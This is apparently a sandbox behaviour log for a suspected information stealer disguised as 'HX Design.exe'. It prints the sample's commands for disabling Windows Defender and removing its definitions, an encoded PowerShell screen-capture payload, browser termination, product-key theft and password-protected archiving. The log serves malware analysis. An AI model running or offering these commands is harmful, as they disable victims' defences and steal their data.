Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe a -r -hp"1" "C:\Users\user\AppData\Local\Temp\WE9Ml.zip" *
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe

Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab

Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe

Code function: 73_2_00007FF77D23B340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

73_2_00007FF77D23B340

Source: C:\Users\user\Desktop\HX Design.exe

Code function: 0_2_00007FF732089570 cpuid

0_2_00007FF732089570

Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\certifi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\ucrtbase.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\_ctypes.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformation	Jump to behavior
